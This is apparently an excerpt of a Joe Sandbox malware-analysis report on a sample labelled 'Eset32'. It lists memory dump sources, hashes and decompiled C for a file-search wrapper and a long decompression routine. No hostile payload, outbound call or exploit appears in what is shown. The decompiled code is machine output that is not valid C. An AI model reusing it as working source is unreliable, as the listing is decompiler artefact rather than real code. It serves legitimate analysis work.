                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.429947309.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.429940533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.429957755.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430001955.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430014747.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430021999.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Eset32.jbxd
                                                          Similarity
                                                          • API ID: Find$CloseFileFirst
                                                          • String ID:
                                                          • API String ID: 2295610775-0
                                                          • Opcode ID: 834111d6c5cf34f6f1a5acdd2360b111687db49f4aa82fd60f9155d80f0d726b
                                                          • Instruction ID: 43645372537bfa69987f3f85d1e9d0a1072f39b89fcefe97c81bac3be47e5bfd
                                                          • Opcode Fuzzy Hash: 834111d6c5cf34f6f1a5acdd2360b111687db49f4aa82fd60f9155d80f0d726b
                                                          • Instruction Fuzzy Hash: 9AD01231514120DFC3502B786D4C84F7A589F05330321CB36F86AF22E0C7348C2296EC
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004027A1 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 39%
                                                          			E004027A1(char __ebx, char* __edi, char* __esi) {
				void* _t19;

				if(FindFirstFileA(E00402BCE(2), _t19 - 0x1d0) != 0xffffffff) {
					E00406055(__edi, _t6);
					_push(_t19 - 0x1a4);
					_push(__esi);
					E004060F7();
				} else {
					 *__edi = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}




                                                          0x004027b9
                                                          0x004027cd
                                                          0x004027d8
                                                          0x004027d9
                                                          0x00402918
                                                          0x004027bb
                                                          0x004027bb
                                                          0x004027bd
                                                          0x004027bf
                                                          0x004027bf
                                                          0x00402a5d
                                                          0x00402a69

                                                          APIs
                                                          • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 004027B0
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.429947309.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.429940533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.429957755.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430001955.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430014747.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430021999.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Eset32.jbxd
                                                          Similarity
                                                          • API ID: FileFindFirst
                                                          • String ID:
                                                          • API String ID: 1974802433-0
                                                          • Opcode ID: fe0c6c70d9fc1c67409d165531832ab6862d9141dea2be007ff0faa3f611277f
                                                          • Instruction ID: cbd12963852304709d998dbd60bf7e8f33587a64a337c4fd13578998f516bfb3
                                                          • Opcode Fuzzy Hash: fe0c6c70d9fc1c67409d165531832ab6862d9141dea2be007ff0faa3f611277f
                                                          • Instruction Fuzzy Hash: 3EF0A072604110DED711EBA49A49AFEB768AF61314F60457FF112B20C1D7B889469B3A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00406945 Relevance: .3, Instructions: 334COMMONCrypto
                                                          Download Yara Rule
                                                          C-Code - Quality: 79%
                                                          			E00406945(signed int __ebx, signed int* __esi) {
				signed int _t396;
				signed int _t425;
				signed int _t442;
				signed int _t443;
				signed int* _t446;
				void* _t448;

				L0:
				while(1) {
					L0:
					_t446 = __esi;
					_t425 = __ebx;
					if( *(_t448 - 0x34) == 0) {
						break;
					}
					L55:
					__eax =  *(__ebp - 0x38);
					 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
					__ecx = __ebx;
					 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
					__ebx = __ebx + 8;
					while(1) {
						L56:
						if(__ebx < 0xe) {
							goto L0;
						}
						L57:
						__eax =  *(__ebp - 0x40);
						__eax =  *(__ebp - 0x40) & 0x00003fff;
						__ecx = __eax;
						__esi[1] = __eax;
						__ecx = __eax & 0x0000001f;
						if(__cl > 0x1d) {
							L9:
							_t443 = _t442 | 0xffffffff;
							 *_t446 = 0x11;
							L10:
							_t446[0x147] =  *(_t448 - 0x40);
							_t446[0x146] = _t425;
							( *(_t448 + 8))[1] =  *(_t448 - 0x34);
							L11:
							 *( *(_t448 + 8)) =  *(_t448 - 0x38);
							_t446[0x26ea] =  *(_t448 - 0x30);
							E004070B4( *(_t448 + 8));
							return _t443;
						}
						L58:
						__eax = __eax & 0x000003e0;
						if(__eax > 0x3a0) {
							goto L9;
						}
						L59:
						 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 0xe;
						__ebx = __ebx - 0xe;
						_t94 =  &(__esi[2]);
						 *_t94 = __esi[2] & 0x00000000;
						 *__esi = 0xc;
						while(1) {
							L60:
							__esi[1] = __esi[1] >> 0xa;
							__eax = (__esi[1] >> 0xa) + 4;
							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
								goto L68;
							}
							L61:
							while(1) {
								L64:
								if(__ebx >= 3) {
									break;
								}
								L62:
								if( *(__ebp - 0x34) == 0) {
									goto L182;
								}
								L63:
								__eax =  *(__ebp - 0x38);
								 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
								__ecx = __ebx;
								 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
								__ebx = __ebx + 8;
							}
							L65:
							__ecx = __esi[2];
							 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000007;
							__ebx = __ebx - 3;
							_t108 = __ecx + 0x408408; // 0x121110
							__ecx =  *_t108;
							 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 3;
							 *(__esi + 0xc +  *_t108 * 4) =  *(__ebp - 0x40) & 0x00000007;
							__ecx = __esi[1];
							__esi[2] = __esi[2] + 1;
							__eax = __esi[2];
							__esi[1] >> 0xa = (__esi[1] >> 0xa) + 4;
							if(__esi[2] < (__esi[1] >> 0xa) + 4) {
								goto L64;
							}
							L66:
							while(1) {
								L68:
								if(__esi[2] >= 0x13) {
									break;
								}
								L67:
								_t119 = __esi[2] + 0x408408; // 0x4000300
								__eax =  *_t119;
								 *(__esi + 0xc +  *_t119 * 4) =  *(__esi + 0xc +  *_t119 * 4) & 0x00000000;
								_t126 =  &(__esi[2]);
								 *_t126 = __esi[2] + 1;
							}
							L69:
							__ecx = __ebp - 8;
							__edi =  &(__esi[0x143]);
							 &(__esi[0x148]) =  &(__esi[0x144]);
							__eax = 0;
							 *(__ebp - 8) = 0;
							__eax =  &(__esi[3]);
							 *__edi = 7;
							__eax = E0040711C( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
							if(__eax != 0) {
								L72:
								 *__esi = 0x11;
								while(1) {
									L180:
									_t396 =  *_t446;
									if(_t396 > 0xf) {
										break;
									}
									L1:
									switch( *((intOrPtr*)(_t396 * 4 +  &M00407074))) {
										case 0:
											L101:
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[5];
											__esi[2] = __esi[5];
											 *__esi = 1;
											goto L102;
										case 1:
											L102:
											__eax = __esi[3];
											while(1) {
												L105:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L103:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L104:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L106:
											__eax =  *(0x40a408 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __ecx;
											if(__ecx != 0) {
												L108:
												__eflags = __cl & 0x00000010;
												if((__cl & 0x00000010) == 0) {
													L110:
													__eflags = __cl & 0x00000040;
													if((__cl & 0x00000040) == 0) {
														goto L125;
													}
													L111:
													__eflags = __cl & 0x00000020;
													if((__cl & 0x00000020) == 0) {
														goto L9;
													}
													L112:
													 *__esi = 7;
													goto L180;
												}
												L109:
												__esi[2] = __ecx;
												__esi[1] = __eax;
												 *__esi = 2;
												goto L180;
											}
											L107:
											__esi[2] = __eax;
											 *__esi = 6;
											goto L180;
										case 2:
											L113:
											__eax = __esi[2];
											while(1) {
												L116:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L114:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L115:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L117:
											 *(0x40a408 + __eax * 2) & 0x0000ffff =  *(0x40a408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[1] = __esi[1] + ( *(0x40a408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[6];
											__esi[2] = __esi[6];
											 *__esi = 3;
											goto L118;
										case 3:
											L118:
											__eax = __esi[3];
											while(1) {
												L121:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L119:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L120:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L122:
											__eax =  *(0x40a408 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __cl & 0x00000010;
											if((__cl & 0x00000010) == 0) {
												L124:
												__eflags = __cl & 0x00000040;
												if((__cl & 0x00000040) != 0) {
													goto L9;
												}
												L125:
												__esi[3] = __ecx;
												__ecx =  *(__eax + 2) & 0x0000ffff;
												__esi[2] = __eax;
												goto L180;
											}
											L123:
											__esi[2] = __ecx;
											__esi[3] = __eax;
											 *__esi = 4;
											goto L180;
										case 4:
											L126:
											__eax = __esi[2];
											while(1) {
												L129:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L127:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L128:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L130:
											 *(0x40a408 + __eax * 2) & 0x0000ffff =  *(0x40a408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[3] = __esi[3] + ( *(0x40a408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											 *__esi = 5;
											goto L131;
										case 5:
											L131:
											__eax =  *(__ebp - 0x30);
											__edx = __esi[3];
											__eax = __eax - __esi;
											__ecx = __eax - __esi - 0x1ba0;
											__eflags = __eax - __esi - 0x1ba0 - __edx;
											if(__eax - __esi - 0x1ba0 >= __edx) {
												__ecx = __eax;
												__ecx = __eax - __edx;
												__eflags = __ecx;
											} else {
												__esi[0x26e8] = __esi[0x26e8] - __edx;
												__ecx = __esi[0x26e8] - __edx - __esi;
												__ecx = __esi[0x26e8] - __edx - __esi + __eax - 0x1ba0;
											}
											__eflags = __esi[1];
											 *(__ebp - 0x20) = __ecx;
											if(__esi[1] != 0) {
												L135:
												__edi =  *(__ebp - 0x2c);
												do {
													L136:
													__eflags = __edi;
													if(__edi != 0) {
														goto L152;
													}
													L137:
													__edi = __esi[0x26e8];
													__eflags = __eax - __edi;
													if(__eax != __edi) {
														L143:
														__esi[0x26ea] = __eax;
														__eax = E004070B4( *((intOrPtr*)(__ebp + 8)));
														__eax = __esi[0x26ea];
														__ecx = __esi[0x26e9];
														__eflags = __eax - __ecx;
														 *(__ebp - 0x30) = __eax;
														if(__eax >= __ecx) {
															__edi = __esi[0x26e8];
															__edi = __esi[0x26e8] - __eax;
															__eflags = __edi;
														} else {
															__ecx = __ecx - __eax;
															__edi = __ecx - __eax - 1;
														}
														__edx = __esi[0x26e8];
														__eflags = __eax - __edx;
														 *(__ebp - 8) = __edx;
														if(__eax == __edx) {
															__edx =  &(__esi[0x6e8]);
															__eflags = __ecx - __edx;
															if(__ecx != __edx) {
																__eax = __edx;
																__eflags = __eax - __ecx;
																 *(__ebp - 0x30) = __eax;
																if(__eax >= __ecx) {
																	__edi =  *(__ebp - 8);
																	__edi =  *(__ebp - 8) - __eax;
																	__eflags = __edi;
																} else {
																	__ecx = __ecx - __eax;
																	__edi = __ecx;
																}
															}
														}
														__eflags = __edi;
														if(__edi == 0) {
															goto L183;
														} else {
															goto L152;
														}
													}
													L138:
													__ecx = __esi[0x26e9];
													__edx =  &(__esi[0x6e8]);
													__eflags = __ecx - __edx;
													if(__ecx == __edx) {
														goto L143;
													}
													L139:
													__eax = __edx;
													__eflags = __eax - __ecx;
													if(__eax >= __ecx) {
														__edi = __edi - __eax;
														__eflags = __edi;
													} else {
														__ecx = __ecx - __eax;
														__edi = __ecx;
													}
													__eflags = __edi;
													if(__edi == 0) {
														goto L143;
													}
													L152:
													__ecx =  *(__ebp - 0x20);
													 *__eax =  *__ecx;
													__eax = __eax + 1;
													__ecx = __ecx + 1;
													__edi = __edi - 1;
													__eflags = __ecx - __esi[0x26e8];
													 *(__ebp - 0x30) = __eax;
													 *(__ebp - 0x20) = __ecx;
													 *(__ebp - 0x2c) = __edi;
													if(__ecx == __esi[0x26e8]) {
														__ecx =  &(__esi[0x6e8]);
														 *(__ebp - 0x20) =  &(__esi[0x6e8]);
													}
													_t357 =  &(__esi[1]);
													 *_t357 = __esi[1] - 1;
													__eflags =  *_t357;
												} while ( *_t357 != 0);
											}
											goto L23;
										case 6:
											L156:
											__eax =  *(__ebp - 0x2c);
											__edi =  *(__ebp - 0x30);
											__eflags = __eax;
											if(__eax != 0) {
												L172:
												__cl = __esi[2];
												 *__edi = __cl;
												__edi = __edi + 1;
												__eax = __eax - 1;
												 *(__ebp - 0x30) = __edi;
												 *(__ebp - 0x2c) = __eax;
												goto L23;
											}
											L157:
											__ecx = __esi[0x26e8];
											__eflags = __edi - __ecx;
											if(__edi != __ecx) {
												L163:
												__esi[0x26ea] = __edi;
												__eax = E004070B4( *((intOrPtr*)(__ebp + 8)));
												__edi = __esi[0x26ea];
												__ecx = __esi[0x26e9];
												__eflags = __edi - __ecx;
												 *(__ebp - 0x30) = __edi;
												if(__edi >= __ecx) {
													__eax = __esi[0x26e8];
													__eax = __esi[0x26e8] - __edi;
													__eflags = __eax;
												} else {
													__ecx = __ecx - __edi;
													__eax = __ecx - __edi - 1;
												}
												__edx = __esi[0x26e8];
												__eflags = __edi - __edx;
												 *(__ebp - 8) = __edx;
												if(__edi == __edx) {
													__edx =  &(__esi[0x6e8]);
													__eflags = __ecx - __edx;
													if(__ecx != __edx) {
														__edi = __edx;
														__eflags = __edi - __ecx;
														 *(__ebp - 0x30) = __edi;
														if(__edi >= __ecx) {
															__eax =  *(__ebp - 8);
															__eax =  *(__ebp - 8) - __edi;
															__eflags = __eax;
														} else {
															__ecx = __ecx - __edi;
															__eax = __ecx;
														}
													}
												}
												__eflags = __eax;
												if(__eax == 0) {
													goto L183;
												} else {
													goto L172;
												}
											}
											L158:
											__eax = __esi[0x26e9];
											__edx =  &(__esi[0x6e8]);
											__eflags = __eax - __edx;
											if(__eax == __edx) {
												goto L163;
											}
											L159:
											__edi = __edx;
											__eflags = __edi - __eax;
											if(__edi >= __eax) {
												__ecx = __ecx - __edi;
												__eflags = __ecx;
												__eax = __ecx;
											} else {
												__eax = __eax - __edi;
												__eax = __eax - 1;
											}
											__eflags = __eax;
											if(__eax != 0) {
												goto L172;
											} else {
												goto L163;
											}
										case 7:
											L173:
											__eflags = __ebx - 7;
											if(__ebx > 7) {
												__ebx = __ebx - 8;
												 *(__ebp - 0x34) =  *(__ebp - 0x34) + 1;
												_t380 = __ebp - 0x38;
												 *_t380 =  *(__ebp - 0x38) - 1;
												__eflags =  *_t380;
											}
											goto L175;
										case 8:
											L4:
											while(_t425 < 3) {
												if( *(_t448 - 0x34) == 0) {
													goto L182;
												} else {
													 *(_t448 - 0x34) =  *(_t448 - 0x34) - 1;
													 *(_t448 - 0x40) =  *(_t448 - 0x40) | ( *( *(_t448 - 0x38)) & 0x000000ff) << _t425;
													 *(_t448 - 0x38) =  &(( *(_t448 - 0x38))[1]);
													_t425 = _t425 + 8;
													continue;
												}
											}
											_t425 = _t425 - 3;
											 *(_t448 - 0x40) =  *(_t448 - 0x40) >> 3;
											_t406 =  *(_t448 - 0x40) & 0x00000007;
											asm("sbb ecx, ecx");
											_t408 = _t406 >> 1;
											_t446[0x145] = ( ~(_t406 & 0x00000001) & 0x00000007) + 8;
											if(_t408 == 0) {
												L24:
												 *_t446 = 9;
												_t436 = _t425 & 0x00000007;
												 *(_t448 - 0x40) =  *(_t448 - 0x40) >> _t436;
												_t425 = _t425 - _t436;
												goto L180;
											}
											L6:
											_t411 = _t408 - 1;
											if(_t411 == 0) {
												L13:
												__eflags =  *0x42e3a8;
												if( *0x42e3a8 != 0) {
													L22:
													_t412 =  *0x40a42c; // 0x9
													_t446[4] = _t412;
													_t413 =  *0x40a430; // 0x5
													_t446[4] = _t413;
													_t414 =  *0x42d224; // 0x42db28
													_t446[5] = _t414;
													_t415 =  *0x42d220; // 0x42e328
													_t446[6] = _t415;
													L23:
													 *_t446 =  *_t446 & 0x00000000;
													goto L180;
												} else {
													_t26 = _t448 - 8;
													 *_t26 =  *(_t448 - 8) & 0x00000000;
													__eflags =  *_t26;
													_t416 = 0x42d228;
													goto L15;
													L20:
													 *_t416 = _t438;
													_t416 = _t416 + 4;
													__eflags = _t416 - 0x42d6a8;
													if(_t416 < 0x42d6a8) {
														L15:
														__eflags = _t416 - 0x42d464;
														_t438 = 8;
														if(_t416 > 0x42d464) {
															__eflags = _t416 - 0x42d628;
															if(_t416 >= 0x42d628) {
																__eflags = _t416 - 0x42d688;
																if(_t416 < 0x42d688) {
																	_t438 = 7;
																}
															} else {
																_t438 = 9;
															}
														}
														goto L20;
													} else {
														E0040711C(0x42d228, 0x120, 0x101, 0x40841c, 0x40845c, 0x42d224, 0x40a42c, 0x42db28, _t448 - 8);
														_push(0x1e);
														_pop(_t440);
														_push(5);
														_pop(_t419);
														memset(0x42d228, _t419, _t440 << 2);
														_t450 = _t450 + 0xc;
														_t442 = 0x42d228 + _t440;
														E0040711C(0x42d228, 0x1e, 0, 0x40849c, 0x4084d8, "(�B", 0x40a430, 0x42db28, _t448 - 8);
														 *0x42e3a8 =  *0x42e3a8 + 1;
														__eflags =  *0x42e3a8;
														goto L22;
													}
												}
											}
											L7:
											_t423 = _t411 - 1;
											if(_t423 == 0) {
												 *_t446 = 0xb;
												goto L180;
											}
											L8:
											if(_t423 != 1) {
												goto L180;
											}
											goto L9;
										case 9:
											while(1) {
												L27:
												__eflags = __ebx - 0x20;
												if(__ebx >= 0x20) {
													break;
												}
												L25:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L26:
												__eax =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__ecx = __ebx;
												 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L28:
											__eax =  *(__ebp - 0x40);
											__ebx = 0;
											__eax =  *(__ebp - 0x40) & 0x0000ffff;
											 *(__ebp - 0x40) = 0;
											__eflags = __eax;
											__esi[1] = __eax;
											if(__eax == 0) {
												goto L53;
											}
											L29:
											_push(0xa);
											_pop(__eax);
											goto L54;
										case 0xa:
											L30:
											__eflags =  *(__ebp - 0x34);
											if( *(__ebp - 0x34) == 0) {
												goto L182;
											}
											L31:
											__eax =  *(__ebp - 0x2c);
											__eflags = __eax;
											if(__eax != 0) {
												L48:
												__eflags = __eax -  *(__ebp - 0x34);
												if(__eax >=  *(__ebp - 0x34)) {
													__eax =  *(__ebp - 0x34);
												}
												__ecx = __esi[1];
												__eflags = __ecx - __eax;
												__edi = __ecx;
												if(__ecx >= __eax) {
													__edi = __eax;
												}
												__eax = E00405C4B( *(__ebp - 0x30),  *(__ebp - 0x38), __edi);
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + __edi;
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - __edi;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __edi;
												 *(__ebp - 0x2c) =  *(__ebp - 0x2c) - __edi;
												_t80 =  &(__esi[1]);
												 *_t80 = __esi[1] - __edi;
												__eflags =  *_t80;
												if( *_t80 == 0) {
													L53:
													__eax = __esi[0x145];
													L54:
													 *__esi = __eax;
												}
												goto L180;
											}
											L32:
											__ecx = __esi[0x26e8];
											__edx =  *(__ebp - 0x30);
											__eflags = __edx - __ecx;
											if(__edx != __ecx) {
												L38:
												__esi[0x26ea] = __edx;
												__eax = E004070B4( *((intOrPtr*)(__ebp + 8)));
												__edx = __esi[0x26ea];
												__ecx = __esi[0x26e9];
												__eflags = __edx - __ecx;
												 *(__ebp - 0x30) = __edx;
												if(__edx >= __ecx) {
													__eax = __esi[0x26e8];
													__eax = __esi[0x26e8] - __edx;
													__eflags = __eax;
												} else {
													__ecx = __ecx - __edx;
													__eax = __ecx - __edx - 1;
												}
												__edi = __esi[0x26e8];
												 *(__ebp - 0x2c) = __eax;
												__eflags = __edx - __edi;
												if(__edx == __edi) {
													__edx =  &(__esi[0x6e8]);
													__eflags = __edx - __ecx;
													if(__eflags != 0) {
														 *(__ebp - 0x30) = __edx;
														if(__eflags >= 0) {
															__edi = __edi - __edx;
															__eflags = __edi;
															__eax = __edi;
														} else {
															__ecx = __ecx - __edx;
															__eax = __ecx;
														}
														 *(__ebp - 0x2c) = __eax;
													}
												}
												__eflags = __eax;
												if(__eax == 0) {
													goto L183;
												} else {
													goto L48;
												}
											}
											L33:
											__eax = __esi[0x26e9];
											__edi =  &(__esi[0x6e8]);
											__eflags = __eax - __edi;
											if(__eax == __edi) {
												goto L38;
											}
											L34:
											__edx = __edi;
											__eflags = __edx - __eax;
											 *(__ebp - 0x30) = __edx;
											if(__edx >= __eax) {
												__ecx = __ecx - __edx;
												__eflags = __ecx;
												__eax = __ecx;
											} else {
												__eax = __eax - __edx;
												__eax = __eax - 1;
											}
											__eflags = __eax;
											 *(__ebp - 0x2c) = __eax;
											if(__eax != 0) {
												goto L48;
											} else {
												goto L38;
											}
										case 0xb:
											goto L56;
										case 0xc:
											L60:
											__esi[1] = __esi[1] >> 0xa;
											__eax = (__esi[1] >> 0xa) + 4;
											if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
												goto L68;
											}
											goto L61;
										case 0xd:
											while(1) {
												L93:
												__eax = __esi[1];
												__ecx = __esi[2];
												__edx = __eax;
												__eax = __eax & 0x0000001f;
												__edx = __edx >> 5;
												__eax = __edx + __eax + 0x102;
												__eflags = __esi[2] - __eax;
												if(__esi[2] >= __eax) {
													break;
												}
												L73:
												__eax = __esi[0x143];
												while(1) {
													L76:
													__eflags = __ebx - __eax;
													if(__ebx >= __eax) {
														break;
													}
													L74:
													__eflags =  *(__ebp - 0x34);
													if( *(__ebp - 0x34) == 0) {
														goto L182;
													}
													L75:
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
													__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
													__ecx = __ebx;
													__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
													 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
													 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
													__ebx = __ebx + 8;
													__eflags = __ebx;
												}
												L77:
												__eax =  *(0x40a408 + __eax * 2) & 0x0000ffff;
												__eax = __eax &  *(__ebp - 0x40);
												__ecx = __esi[0x144];
												__eax = __esi[0x144] + __eax * 4;
												__edx =  *(__eax + 1) & 0x000000ff;
												__eax =  *(__eax + 2) & 0x0000ffff;
												__eflags = __eax - 0x10;
												 *(__ebp - 0x14) = __eax;
												if(__eax >= 0x10) {
													L79:
													__eflags = __eax - 0x12;
													if(__eax != 0x12) {
														__eax = __eax + 0xfffffff2;
														 *(__ebp - 8) = 3;
													} else {
														_push(7);
														 *(__ebp - 8) = 0xb;
														_pop(__eax);
													}
													while(1) {
														L84:
														__ecx = __eax + __edx;
														__eflags = __ebx - __eax + __edx;
														if(__ebx >= __eax + __edx) {
															break;
														}
														L82:
														__eflags =  *(__ebp - 0x34);
														if( *(__ebp - 0x34) == 0) {
															goto L182;
														}
														L83:
														__ecx =  *(__ebp - 0x38);
														 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
														__edi =  *( *(__ebp - 0x38)) & 0x000000ff;
														__ecx = __ebx;
														__edi = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
														 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
														 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
														__ebx = __ebx + 8;
														__eflags = __ebx;
													}
													L85:
													__ecx = __edx;
													__ebx = __ebx - __edx;
													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
													 *(0x40a408 + __eax * 2) & 0x0000ffff =  *(0x40a408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
													__edx =  *(__ebp - 8);
													__ebx = __ebx - __eax;
													__edx =  *(__ebp - 8) + ( *(0x40a408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
													__ecx = __eax;
													__eax = __esi[1];
